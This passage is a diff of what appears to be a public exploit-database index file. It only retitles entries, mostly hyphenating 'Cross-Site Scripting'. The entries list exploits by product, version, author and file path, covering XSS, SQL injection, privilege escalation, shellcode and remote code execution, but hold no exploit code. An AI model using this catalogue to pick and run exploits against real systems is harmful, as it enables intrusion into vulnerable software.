K.S",php,webapps,0 37029,platforms/java/webapps/37029.txt,"ManageEngine Firewall Analyzer 7.2 fw/index2.do Multiple Parameter XSS",2012-04-01,"Vulnerability Research Laboratory",java,webapps,0 37030,platforms/java/webapps/37030.txt,"ManageEngine Firewall Analyzer 7.2 fw/createAnomaly.do subTab Parameter XSS",2012-04-01,"Vulnerability Research Laboratory",java,webapps,0 37031,platforms/java/webapps/37031.txt,"ManageEngine Firewall Analyzer 7.2 fw/mindex.do url Parameter XSS",2012-04-01,"Vulnerability Research Laboratory",java,webapps,0 37032,platforms/java/webapps/37032.txt,"ManageEngine Firewall Analyzer 7.2 fw/syslogViewer.do port Parameter XSS",2012-04-01,"Vulnerability Research Laboratory",java,webapps,0 -37033,platforms/java/webapps/37033.txt,"JBMC Software DirectAdmin 1.403 - 'domain' Parameter Cross Site Scripting",2012-04-02,"Dawid Golak",java,webapps,0 +37033,platforms/java/webapps/37033.txt,"JBMC Software DirectAdmin 1.403 - 'domain' Parameter Cross-Site Scripting",2012-04-02,"Dawid Golak",java,webapps,0 37034,platforms/php/webapps/37034.txt,"FlatnuX CMS controlcenter.php contents/Files Action dir Parameter Traversal Arbitrary File Access",2012-04-01,"Vulnerability Laboratory",php,webapps,0 37035,platforms/php/webapps/37035.html,"FlatnuX CMS Admin User Creation CSRF",2012-04-01,"Vulnerability Laboratory",php,webapps,0 37036,platforms/linux/dos/37036.txt,"Flock 2.6.1 Denial of Service",2012-03-31,r45c4l,linux,dos,0 -37037,platforms/hardware/remote/37037.txt,"Arbor Networks Peakflow SP 3.6.1 - 'index/' Cross Site Scripting",2012-04-03,b.saleh,hardware,remote,0 +37037,platforms/hardware/remote/37037.txt,"Arbor Networks Peakflow SP 3.6.1 - 'index/' Cross-Site Scripting",2012-04-03,b.saleh,hardware,remote,0 37038,platforms/php/webapps/37038.txt,"osCMax 2.5 admin/login.php username Parameter XSS",2012-04-04,"High-Tech Bridge SA",php,webapps,0 37039,platforms/php/webapps/37039.txt,"osCMax 2.5 admin/htaccess.php Multiple Parameter XSS",2012-04-04,"High-Tech Bridge SA",php,webapps,0 37040,platforms/php/webapps/37040.txt,"osCMax 2.5 admin/xsell.php search Parameter XSS",2012-04-04,"High-Tech Bridge SA",php,webapps,0 @@ -33439,7 +33439,7 @@ id,file,description,date,author,platform,type,port 37052,platforms/windows/local/37052.c,"Windows - CNG.SYS Kernel Security Feature Bypass PoC (MS15-052)",2015-05-18,4B5F5F4B,windows,local,0 37053,platforms/multiple/dos/37053.c,"QEMU - Floppy Disk Controller (FDC) PoC",2015-05-18,"Marcus Meissner",multiple,dos,0 37054,platforms/php/webapps/37054.py,"ElasticSearch < 1.4.5 / < 1.5.2 - Path Transversal",2015-05-18,pandujar,php,webapps,0 -37055,platforms/php/webapps/37055.txt,"Forma LMS 1.3 Multiple PHP Object Injection Vulnerabilities",2015-05-18,"Filippo Roncari",php,webapps,80 +37055,platforms/php/webapps/37055.txt,"Forma LMS 1.3 - Multiple PHP Object Injection Vulnerabilities",2015-05-18,"Filippo Roncari",php,webapps,80 37056,platforms/windows/local/37056.py,"BulletProof FTP Client 2010 - Buffer Overflow (DEP Bypass)",2015-05-18,"Gabor Seljan",windows,local,0 37057,platforms/ios/webapps/37057.txt,"Wireless Photo Transfer 3.0 iOS - File Inclusion",2015-05-18,Vulnerability-Lab,ios,webapps,80 37058,platforms/multiple/webapps/37058.txt,"OYO File Manager 1.1 (iOS & Android) - Multiple Vulnerabilities",2015-05-18,Vulnerability-Lab,multiple,webapps,8080 @@ -33452,33 +33452,33 @@ id,file,description,date,author,platform,type,port 37067,platforms/php/webapps/37067.txt,"WordPress FeedWordPress Plugin 2015.0426 - SQL Injection",2015-05-20,"Adrián M. F.",php,webapps,80 37068,platforms/windows/dos/37068.py,"ZOC SSH Client Buffer Overflow (SEH)",2015-05-20,"Dolev Farhi",windows,dos,0 37069,platforms/lin_x86/shellcode/37069.c,"Linux/x86 - execve _/bin/sh_ shellcode (26 bytes)",2015-05-20,"Reza Behzadpour",lin_x86,shellcode,0 -37070,platforms/php/webapps/37070.txt,"WordPress Uploadify Integration Plugin 0.9.6 Multiple Cross Site Scripting Vulnerabilities",2012-04-06,waraxe,php,webapps,0 -37071,platforms/php/webapps/37071.txt,"CitrusDB 2.4.1 - Local File Inclusion and SQL Injection",2012-04-09,wacky,php,webapps,0 -37072,platforms/php/webapps/37072.txt,"Matterdaddy Market 1.1 Multiple SQL Injection",2012-04-10,"Chokri B.A",php,webapps,0 -37073,platforms/php/webapps/37073.html,"BGS CMS 2.2.1 Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2012-04-11,LiquidWorm,php,webapps,0 +37070,platforms/php/webapps/37070.txt,"WordPress Uploadify Integration Plugin 0.9.6 - Multiple Cross-Site Scripting Vulnerabilities",2012-04-06,waraxe,php,webapps,0 +37071,platforms/php/webapps/37071.txt,"CitrusDB 2.4.1 - Local File Inclusion / SQL Injection",2012-04-09,wacky,php,webapps,0 +37072,platforms/php/webapps/37072.txt,"Matterdaddy Market 1.1 - Multiple SQL Injection",2012-04-10,"Chokri B.A",php,webapps,0 +37073,platforms/php/webapps/37073.html,"BGS CMS 2.2.1 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-04-11,LiquidWorm,php,webapps,0 37074,platforms/php/webapps/37074.txt,"WordPress WP Membership Plugin 1.2.3 - Multiple Vulnerabilities",2015-05-21,"Panagiotis Vagenas",php,webapps,0 37152,platforms/jsp/webapps/37152.txt,"JSPMyAdmin 1.1 - Multiple Vulnerabilities",2015-05-29,hyp3rlinx,jsp,webapps,80 37075,platforms/php/webapps/37075.txt,"All-in-One Event Calendar Plugin 1.4 for WordPress /wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php title Parameter XSS",2012-04-11,"High-Tech Bridge SA",php,webapps,0 37076,platforms/php/webapps/37076.txt,"All-in-One Event Calendar Plugin 1.4 for WordPress /wp-content/plugins/all-in-one-event-calendar/app/view/box_publish_button.php button_value Parameter XSS",2012-04-11,"High-Tech Bridge SA",php,webapps,0 37077,platforms/php/webapps/37077.txt,"All-in-One Event Calendar Plugin 1.4 for WordPress /wp-content/plugins/all-in-one-event-calendar/app/view/save_successful.php msg Parameter XSS",2012-04-11,"High-Tech Bridge SA",php,webapps,0 37078,platforms/php/webapps/37078.txt,"All-in-One Event Calendar Plugin 1.4 for WordPress /wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php Multiple Parameter XSS",2012-04-11,"High-Tech Bridge SA",php,webapps,0 -37079,platforms/php/webapps/37079.txt,"Forma LMS 1.3 Multiple SQL Injection",2015-05-21,"Filippo Roncari",php,webapps,80 +37079,platforms/php/webapps/37079.txt,"Forma LMS 1.3 - Multiple SQL Injection",2015-05-21,"Filippo Roncari",php,webapps,80 37080,platforms/php/webapps/37080.txt,"WordPress WP Symposium Plugin 15.1 SQL Injection",2015-05-21,"Hannes Trunde",php,webapps,80 37081,platforms/multiple/remote/37081.py,"McAfee Web Gateway 7.1.5.x - 'Host' HTTP Header Security Bypass",2012-04-16,"Gabriel Menezes Nunes",multiple,remote,0 -37082,platforms/php/webapps/37082.txt,"Bioly 1.3 - 'index.php' Cross Site Scripting and SQL Injection",2012-04-16,T0xic,php,webapps,0 -37083,platforms/php/webapps/37083.txt,"Joomla! Beatz Plugin 1.1 Multiple Cross Site Scripting Vulnerabilities",2012-04-16,"Aung Khant",php,webapps,0 +37082,platforms/php/webapps/37082.txt,"Bioly 1.3 - 'index.php' Cross-Site Scripting / SQL Injection",2012-04-16,T0xic,php,webapps,0 +37083,platforms/php/webapps/37083.txt,"Joomla! Beatz Plugin 1.1 - Multiple Cross-Site Scripting Vulnerabilities",2012-04-16,"Aung Khant",php,webapps,0 37084,platforms/cgi/webapps/37084.txt,"Munin 2.0~rc4-1 Remote Command Injection",2012-04-13,"Helmut Grohne",cgi,webapps,0 37085,platforms/php/webapps/37085.txt,"Seditio CMS 165 - 'plug.php' SQL Injection",2012-04-15,AkaStep,php,webapps,0 -37086,platforms/php/webapps/37086.txt,"WordPress Yahoo Answer Plugin Multiple Cross Site Scripting Vulnerabilities",2012-04-16,"Ryuzaki Lawlet",php,webapps,0 +37086,platforms/php/webapps/37086.txt,"WordPress Yahoo Answer Plugin Multiple Cross-Site Scripting Vulnerabilities",2012-04-16,"Ryuzaki Lawlet",php,webapps,0 37087,platforms/php/webapps/37087.txt,"TeamPass 2.1.5 - 'login' Field HTML Injection",2012-04-17,"Marcos Garcia",php,webapps,0 37088,platforms/linux/local/37088.c,"Apport (Ubuntu 14.04/14.10/15.04) - Local Root Race Condition",2015-05-23,rebel,linux,local,0 37089,platforms/linux/local/37089.txt,"Fuse 2.9.3-15 - Local Privilege Escalation",2015-05-23,"Tavis Ormandy",linux,local,0 37090,platforms/php/webapps/37090.txt,"Joomla! JA T3 Framework Component Directory Traversal",2012-04-17,indoushka,php,webapps,0 -37091,platforms/php/webapps/37091.txt,"Acuity CMS 2.6.2 - 'UserName' Parameter Cross Site Scripting",2012-04-17,"Aung Khant",php,webapps,0 +37091,platforms/php/webapps/37091.txt,"Acuity CMS 2.6.2 - 'UserName' Parameter Cross-Site Scripting",2012-04-17,"Aung Khant",php,webapps,0 37092,platforms/php/webapps/37092.txt,"XOOPS 2.5.4 - /modules/pm/pmlite.php to_userid Parameter XSS",2012-04-18,"High-Tech Bridge SA",php,webapps,0 37093,platforms/php/webapps/37093.txt,"XOOPS 2.5.4 - /tiny_mce/plugins/xoopsimagemanager/xoopsimagebrowser.php Multiple Parameter XSS",2012-04-18,"High-Tech Bridge SA",php,webapps,0 37094,platforms/php/webapps/37094.txt,"ownCloud 3.0.0 index.php redirect_url Parameter Arbitrary Site Redirect",2012-04-18,"Tobias Glemser",php,webapps,0 -37095,platforms/php/webapps/37095.txt,"Pendulab ChatBlazer 8.5 - 'username' Parameter Cross Site Scripting",2012-04-20,sonyy,php,webapps,0 +37095,platforms/php/webapps/37095.txt,"Pendulab ChatBlazer 8.5 - 'username' Parameter Cross-Site Scripting",2012-04-20,sonyy,php,webapps,0 37096,platforms/php/webapps/37096.html,"Anchor CMS 0.6-14-ga85d0a0 - 'id' Parameter Multiple HTML Injection Vulnerabilities",2012-04-20,"Gjoko Krstic",php,webapps,0 37097,platforms/ios/remote/37097.py,"FTP Media Server 3.0 - Authentication Bypass and Denial of Service",2015-05-25,"Wh1t3Rh1n0 (Michael Allen)",ios,remote,0 37098,platforms/windows/local/37098.txt,"Microsoft Windows - Local Privilege Escalation (MS15-010)",2015-05-25,"Sky lake",windows,local,0 @@ -33488,9 +33488,9 @@ id,file,description,date,author,platform,type,port 37100,platforms/php/webapps/37100.txt,"Waylu CMS - 'products_xx.php' SQL Injection / HTML Injection",2012-04-20,TheCyberNuxbie,php,webapps,0 37101,platforms/php/webapps/37101.txt,"Joomla CCNewsLetter Module 1.0.7 - 'id' Parameter SQL Injection",2012-04-23,E1nzte1N,php,webapps,0 37102,platforms/php/webapps/37102.txt,"Joomla! Video Gallery component Local File Inclusion and SQL Injection",2012-04-24,KedAns-Dz,php,webapps,0 -37103,platforms/php/webapps/37103.txt,"concrete5 5.5.2.1 - Information Disclosure / SQL Injection / Cross Site Scripting",2012-04-26,"Jakub Galczyk",php,webapps,0 -37104,platforms/php/webapps/37104.txt,"gpEasy 2.3.3 - 'jsoncallback' Parameter Cross Site Scripting",2012-04-26,"Jakub Galczyk",php,webapps,0 -37105,platforms/php/webapps/37105.txt,"Quick.CMS 4.0 - 'p' Parameter Cross Site Scripting",2012-04-26,"Jakub Galczyk",php,webapps,0 +37103,platforms/php/webapps/37103.txt,"concrete5 5.5.2.1 - Information Disclosure / SQL Injection / Cross-Site Scripting",2012-04-26,"Jakub Galczyk",php,webapps,0 +37104,platforms/php/webapps/37104.txt,"gpEasy 2.3.3 - 'jsoncallback' Parameter Cross-Site Scripting",2012-04-26,"Jakub Galczyk",php,webapps,0 +37105,platforms/php/webapps/37105.txt,"Quick.CMS 4.0 - 'p' Parameter Cross-Site Scripting",2012-04-26,"Jakub Galczyk",php,webapps,0 37106,platforms/php/webapps/37106.txt,"WordPress Video Gallery Plugin 2.8 Arbitrary Mail Relay",2015-05-26,"Claudio Viviani",php,webapps,80 37107,platforms/php/webapps/37107.txt,"WordPress NewStatPress Plugin 0.9.8 - Multiple Vulnerabilities",2015-05-26,"Adrián M. F.",php,webapps,80 37108,platforms/php/webapps/37108.txt,"WordPress Landing Pages Plugin 1.8.4 - Multiple Vulnerabilities",2015-05-26,"Adrián M. F.",php,webapps,80 @@ -33502,28 +33502,28 @@ id,file,description,date,author,platform,type,port 37114,platforms/jsp/webapps/37114.txt,"Sendio ESP Information Disclosure",2015-05-26,"Core Security",jsp,webapps,80 37115,platforms/perl/webapps/37115.txt,"Clickheat 1.13+ Remote Command Execution",2015-05-26,"Calum Hutton",perl,webapps,0 37116,platforms/php/webapps/37116.py,"SilverStripe 2.4.7 install.php PHP Code Injection",2012-04-27,"Mehmet Ince",php,webapps,0 -37117,platforms/perl/webapps/37117.txt,"Croogo CMS 1.3.4 Multiple HTML Injection Vulnerabilities",2012-04-29,"Chokri Ben Achor",perl,webapps,0 -37118,platforms/php/webapps/37118.txt,"SKYUC 3.2.1 - 'encode' Parameter Cross Site Scripting",2012-04-27,farbodmahini,php,webapps,0 +37117,platforms/perl/webapps/37117.txt,"Croogo CMS 1.3.4 - Multiple HTML Injection Vulnerabilities",2012-04-29,"Chokri Ben Achor",perl,webapps,0 +37118,platforms/php/webapps/37118.txt,"SKYUC 3.2.1 - 'encode' Parameter Cross-Site Scripting",2012-04-27,farbodmahini,php,webapps,0 37119,platforms/asp/webapps/37119.txt,"XM Forum 'id' Parameter Multiple SQL Injection",2012-04-27,"Farbod Mahini",asp,webapps,0 37120,platforms/php/webapps/37120.txt,"Uiga FanClub 'p' Parameter SQL Injection",2012-04-27,"Farbod Mahini",php,webapps,0 37121,platforms/asp/webapps/37121.txt,"BBSXP CMS Multiple SQL Injection",2012-04-27,"Farbod Mahini",asp,webapps,0 37122,platforms/php/webapps/37122.txt,"Shawn Bradley PHP Volunteer Management 1.0.2 - 'id' Parameter SQL Injection",2012-04-28,eidelweiss,php,webapps,0 -37123,platforms/php/webapps/37123.txt,"WordPress WPsc MijnPress Plugin 'rwflush' Parameter Cross Site Scripting",2012-04-30,Am!r,php,webapps,0 +37123,platforms/php/webapps/37123.txt,"WordPress WPsc MijnPress Plugin 'rwflush' Parameter Cross-Site Scripting",2012-04-30,Am!r,php,webapps,0 37124,platforms/windows/dos/37124.txt,"Acoustica Pianissimo 1.0 Build 12 - (Registration ID) Buffer Overflow PoC",2015-05-26,LiquidWorm,windows,dos,0 37125,platforms/php/webapps/37125.txt,"MySQLDumper 1.24.4 restore.php filename Parameter XSS",2012-04-27,AkaStep,php,webapps,0 37126,platforms/perl/webapps/37126.txt,"MySQLDumper 1.24.4 install.php language Parameter Traversal Arbitrary File Access",2012-04-27,AkaStep,perl,webapps,0 37127,platforms/php/webapps/37127.txt,"MySQLDumper 1.24.4 install.php Multiple Parameter XSS",2012-04-27,AkaStep,php,webapps,0 37128,platforms/php/webapps/37128.txt,"MySQLDumper 1.24.4 sql.php Multiple Parameter XSS",2012-04-27,AkaStep,php,webapps,0 37129,platforms/php/webapps/37129.txt,"MySQLDumper 1.24.4 filemanagement.php f Parameter Traversal Arbitrary File Access",2012-04-27,AkaStep,php,webapps,0 -37130,platforms/php/webapps/37130.txt,"MySQLDumper 1.24.4 Multiple Script Direct Request Information Disclosure",2012-04-27,AkaStep,php,webapps,0 +37130,platforms/php/webapps/37130.txt,"MySQLDumper 1.24.4 - Multiple Script Direct Request Information Disclosure",2012-04-27,AkaStep,php,webapps,0 37131,platforms/php/webapps/37131.txt,"MySQLDumper 1.24.4 main.php Multiple Function CSRF",2012-04-27,AkaStep,php,webapps,0 37132,platforms/php/webapps/37132.txt,"WordPress Plugin Free Counter 1.1 Stored XSS",2015-05-27,"Panagiotis Vagenas",php,webapps,80 37133,platforms/php/webapps/37133.txt,"MySQLDumper 1.24.4 index.php page Parameter XSS",2012-04-27,AkaStep,php,webapps,0 37134,platforms/php/webapps/37134.php,"MySQLDumper 1.24.4 - 'menu.php' Remote PHP Code Execution",2012-04-27,AkaStep,php,webapps,0 -37135,platforms/hardware/webapps/37135.txt,"iGuard Security Access Control Device Firmware 3.6.7427A Cross Site Scripting",2012-05-02,"Usman Saeed",hardware,webapps,0 +37135,platforms/hardware/webapps/37135.txt,"iGuard Security Access Control Device Firmware 3.6.7427A Cross-Site Scripting",2012-05-02,"Usman Saeed",hardware,webapps,0 37136,platforms/php/webapps/37136.txt,"Trombinoscope 3.x - 'photo.php' Server SQL Injection",2012-05-07,"Ramdan Yantu",php,webapps,0 37137,platforms/php/webapps/37137.txt,"Schneider Electric Telecontrol Kerweb 3.0.0/6.0.0 - 'kw.dll' HTML Injection",2012-05-06,phocean,php,webapps,0 -37138,platforms/php/webapps/37138.txt,"Ramui Forum Script 'query' Parameter Cross Site Scripting",2012-05-07,3spi0n,php,webapps,0 +37138,platforms/php/webapps/37138.txt,"Ramui Forum Script 'query' Parameter Cross-Site Scripting",2012-05-07,3spi0n,php,webapps,0 37139,platforms/php/webapps/37139.txt,"JibberBook 2.3 - 'Login_form.php' Authentication Security Bypass",2012-05-07,L3b-r1'z,php,webapps,0 37140,platforms/php/webapps/37140.html,"PHP Enter 4.1.2 - 'banners.php' PHP Code Injection",2012-05-08,L3b-r1'z,php,webapps,0 37141,platforms/hardware/remote/37141.txt,"Linksys WRT54GL Wireless Router Cross-Site Request Forgery",2012-05-08,Kalashinkov3,hardware,remote,0 @@ -33531,7 +33531,7 @@ id,file,description,date,author,platform,type,port 37143,platforms/php/webapps/37143.txt,"OrangeHRM 2.7 RC plugins/ajaxCalls/haltResumeHsp.php newHspStatus Parameter XSS",2012-05-09,"High-Tech Bridge SA",php,webapps,0 37144,platforms/php/webapps/37144.txt,"OrangeHRM 2.7 RC templates/hrfunct/emppop.php sortOrder1 Parameter XSS",2012-05-09,"High-Tech Bridge SA",php,webapps,0 37145,platforms/php/webapps/37145.txt,"OrangeHRM 2.7 RC index.php uri Parameter XSS",2012-05-09,"High-Tech Bridge SA",php,webapps,0 -37146,platforms/php/webapps/37146.txt,"PivotX 2.3.2 - 'ajaxhelper.php' Cross Site Scripting",2012-05-09,"High-Tech Bridge SA",php,webapps,0 +37146,platforms/php/webapps/37146.txt,"PivotX 2.3.2 - 'ajaxhelper.php' Cross-Site Scripting",2012-05-09,"High-Tech Bridge SA",php,webapps,0 37147,platforms/php/webapps/37147.txt,"Chevereto 1.91 Upload/engine.php v Parameter XSS",2012-05-10,AkaStep,php,webapps,0 37148,platforms/php/webapps/37148.txt,"Chevereto 1.91 Upload/engine.php v Parameter Traversal Arbitrary File Enumeration",2012-05-10,AkaStep,php,webapps,0 37149,platforms/windows/dos/37149.py,"Private Shell SSH Client 3.3 - Crash PoC",2015-05-29,3unnym00n,windows,dos,22 @@ -33539,14 +33539,14 @@ id,file,description,date,author,platform,type,port 37151,platforms/php/webapps/37151.txt,"TCPDF Library 5.9 Arbitrary File Deletion",2015-05-29,"Filippo Roncari",php,webapps,80 37170,platforms/hardware/remote/37170.rb,"Airties login-cgi Buffer Overflow",2015-06-01,Metasploit,hardware,remote,0 37154,platforms/hardware/webapps/37154.rb,"ESC 8832 Data Controller - Multiple Vulnerabilities",2015-05-29,"Balazs Makany",hardware,webapps,80 -37155,platforms/php/webapps/37155.txt,"WordPress WP-FaceThumb 0.1 - 'pagination_wp_facethum' Parameter Cross Site Scripting",2012-05-13,d3v1l,php,webapps,0 +37155,platforms/php/webapps/37155.txt,"WordPress WP-FaceThumb 0.1 - 'pagination_wp_facethum' Parameter Cross-Site Scripting",2012-05-13,d3v1l,php,webapps,0 37156,platforms/php/webapps/37156.txt,"GetSimple CMS 3.1 admin/theme.php err Parameter Reflected XSS",2012-05-12,"Chokri Ben Achor",php,webapps,0 37157,platforms/php/webapps/37157.txt,"GetSimple CMS 3.1 admin/pages.php error Parameter Reflected XSS",2012-05-12,"Chokri Ben Achor",php,webapps,0 37158,platforms/php/webapps/37158.txt,"GetSimple CMS 3.1 admin/index.php Multiple Parameter Reflected XSS",2012-05-12,"Chokri Ben Achor",php,webapps,0 37159,platforms/php/webapps/37159.txt,"GetSimple CMS 3.1 admin/upload.php path Parameter XSS",2012-05-12,"Chokri Ben Achor",php,webapps,0 37160,platforms/windows/dos/37160.pl,"Universal Reader 1.16.740.0 - 'uread.exe' Denial Of Service",2012-05-14,demonalex,windows,dos,0 -37161,platforms/php/webapps/37161.txt,"WordPress GRAND Flash Album Gallery 1.71 - 'admin.php' Cross Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 -37162,platforms/php/webapps/37162.txt,"Dynamic Widgets WordPress Plugin 1.5.1 - 'themes.php' Cross Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 +37161,platforms/php/webapps/37161.txt,"WordPress GRAND Flash Album Gallery 1.71 - 'admin.php' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 +37162,platforms/php/webapps/37162.txt,"Dynamic Widgets WordPress Plugin 1.5.1 - 'themes.php' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 37163,platforms/windows/remote/37163.py,"IBM Security AppScan Standard 9.0.2 - OLE Automation Array Remote Code Execution",2015-06-01,"Naser Farhadi",windows,remote,0 37165,platforms/windows/remote/37165.py,"WebDrive 12.2 (Build #4172) - Buffer OverFlow PoC",2015-06-01,metacom,windows,remote,0 37166,platforms/php/webapps/37166.php,"WordPress dzs-zoomsounds Plugins 2.0 - Remote File Upload",2015-06-01,"nabil chris",php,webapps,0 @@ -33554,54 +33554,54 @@ id,file,description,date,author,platform,type,port 37168,platforms/linux/local/37168.txt,"PonyOS 3.0 - ELF Loader Privilege Escalation",2015-06-01,"Hacker Fantastic",linux,local,0 37171,platforms/hardware/remote/37171.rb,"D-Link Devices HNAP SOAPAction-Header Command Execution",2015-06-01,Metasploit,hardware,remote,0 37172,platforms/hardware/webapps/37172.txt,"Aruba ClearPass Policy Manager Stored XSS",2015-06-01,"Cristiano Maruti",hardware,webapps,0 -37173,platforms/php/webapps/37173.txt,"Download Monitor 3.3.5.4 - 'uploader.php' Multiple Cross Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 -37174,platforms/php/webapps/37174.txt,"WordPress Network Publisher 5.0.1 - 'networkpub_key' Cross Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 -37175,platforms/php/webapps/37175.txt,"Download Manager 2.2.2 - 'cid' Parameter Cross Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 -37176,platforms/php/webapps/37176.txt,"PDF & Print Button Joliprint 1.3.0 Multiple Cross Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 -37177,platforms/php/webapps/37177.txt,"CataBlog WordPress Plugin 1.6 'admin.php' Cross Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 -37178,platforms/php/webapps/37178.txt,"2 Click Social Media Buttons 0.32.2 Multiple Cross Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 -37179,platforms/php/webapps/37179.txt,"iFrame Admin Pages 0.1 - 'main_page.php' Cross Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 -37180,platforms/php/webapps/37180.txt,"WordPress Newsletter Manager Plugin 1.0 Multiple Cross Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 +37173,platforms/php/webapps/37173.txt,"Download Monitor 3.3.5.4 - 'uploader.php' Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 +37174,platforms/php/webapps/37174.txt,"WordPress Network Publisher 5.0.1 - 'networkpub_key' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 +37175,platforms/php/webapps/37175.txt,"Download Manager 2.2.2 - 'cid' Parameter Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 +37176,platforms/php/webapps/37176.txt,"PDF & Print Button Joliprint 1.3.0 - Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 +37177,platforms/php/webapps/37177.txt,"CataBlog WordPress Plugin 1.6 'admin.php' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 +37178,platforms/php/webapps/37178.txt,"2 Click Social Media Buttons 0.32.2 - Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 +37179,platforms/php/webapps/37179.txt,"iFrame Admin Pages 0.1 - 'main_page.php' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 +37180,platforms/php/webapps/37180.txt,"WordPress Newsletter Manager Plugin 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 37184,platforms/hardware/remote/37184.py,"Seagate Central 2014.0410.0026-F Remote Root Exploit",2015-06-03,"Jeremy Brown",hardware,remote,0 37185,platforms/hardware/webapps/37185.py,"Seagate Central 2014.0410.0026-F Remote Facebook Access Token Exploit",2015-06-03,"Jeremy Brown",hardware,webapps,0 37182,platforms/php/webapps/37182.txt,"WordPress LeagueManager 3.9.11 Plugin - SQLi",2015-06-02,javabudd,php,webapps,0 37183,platforms/linux/local/37183.c,"PonyOS 3.0 - tty ioctl() Local Kernel Exploit",2015-06-02,"Hacker Fantastic",linux,local,0 37187,platforms/windows/dos/37187.py,"Jildi FTP Client Buffer Overflow PoC",2015-06-03,metacom,windows,dos,21 37188,platforms/windows/dos/37188.txt,"WebDrive 12.2 (B4172) - Buffer Overflow",2015-06-03,Vulnerability-Lab,windows,dos,0 -37189,platforms/php/webapps/37189.txt,"Media Library Categories Multiple Cross Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 -37190,platforms/php/webapps/37190.txt,"LeagueManager 3.7 Multiple Cross Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 +37189,platforms/php/webapps/37189.txt,"Media Library Categories Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 +37190,platforms/php/webapps/37190.txt,"LeagueManager 3.7 - Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 37191,platforms/php/webapps/37191.txt,"Leaflet Maps Marker Plugin 0.0.1 for WordPress leaflet_layer.php id Parameter XSS",2012-05-15,"Heine Pedersen",php,webapps,0 37192,platforms/php/webapps/37192.txt,"Leaflet Maps Marker Plugin 0.0.1 for WordPress leaflet_marker.php id Parameter XSS",2012-05-15,"Heine Pedersen",php,webapps,0 -37193,platforms/php/webapps/37193.txt,"GD Star Rating 1.9.16 'tpl_section' Parameter Cross Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 -37194,platforms/php/webapps/37194.txt,"Mingle Forum 1.0.33 - 'admin.php' Multiple Cross Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 +37193,platforms/php/webapps/37193.txt,"GD Star Rating 1.9.16 'tpl_section' Parameter Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 +37194,platforms/php/webapps/37194.txt,"Mingle Forum 1.0.33 - 'admin.php' Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 37195,platforms/php/webapps/37195.txt,"WP Forum Server Plugin 1.7.3 for WordPress fs-admin/fs-admin.php Multiple Parameter XSS",2012-05-15,"Heine Pedersen",php,webapps,0 -37196,platforms/php/webapps/37196.txt,"Pretty Link Lite WordPress Plugin 1.5.2 - SQL Injection / Cross Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 +37196,platforms/php/webapps/37196.txt,"Pretty Link Lite WordPress Plugin 1.5.2 - SQL Injection / Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 37198,platforms/multiple/remote/37198.rb,"JDownloader 2 Beta - Directory Traversal",2015-06-04,PizzaHatHacker,multiple,remote,0 37199,platforms/hardware/dos/37199.txt,"ZTE AC 3633R USB Modem - Multiple Vulnerabilities",2015-06-04,Vishnu,hardware,dos,0 -37200,platforms/php/webapps/37200.txt,"WordPress zM Ajax Login & Register Plugin 1.0.9 Local File Inclusion",2015-06-04,"Panagiotis Vagenas",php,webapps,80 -37201,platforms/php/webapps/37201.txt,"WordPress Sharebar Plugin 1.2.1 - SQL Injection / Cross Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 -37202,platforms/php/webapps/37202.txt,"Share and Follow 1.80.3 - 'admin.php' Cross Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 -37203,platforms/php/webapps/37203.txt,"WordPress Soundcloud Is Gold 2.1 - 'width' Parameter Cross Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 -37204,platforms/php/webapps/37204.txt,"WordPress Track That Stat 1.0.8 Cross Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 -37205,platforms/php/webapps/37205.txt,"LongTail JW Player 'debug' Parameter Cross Site Scripting",2012-05-16,gainover,php,webapps,0 +37200,platforms/php/webapps/37200.txt,"WordPress zM Ajax Login & Register Plugin 1.0.9 - Local File Inclusion",2015-06-04,"Panagiotis Vagenas",php,webapps,80 +37201,platforms/php/webapps/37201.txt,"WordPress Sharebar Plugin 1.2.1 - SQL Injection / Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 +37202,platforms/php/webapps/37202.txt,"Share and Follow 1.80.3 - 'admin.php' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 +37203,platforms/php/webapps/37203.txt,"WordPress Soundcloud Is 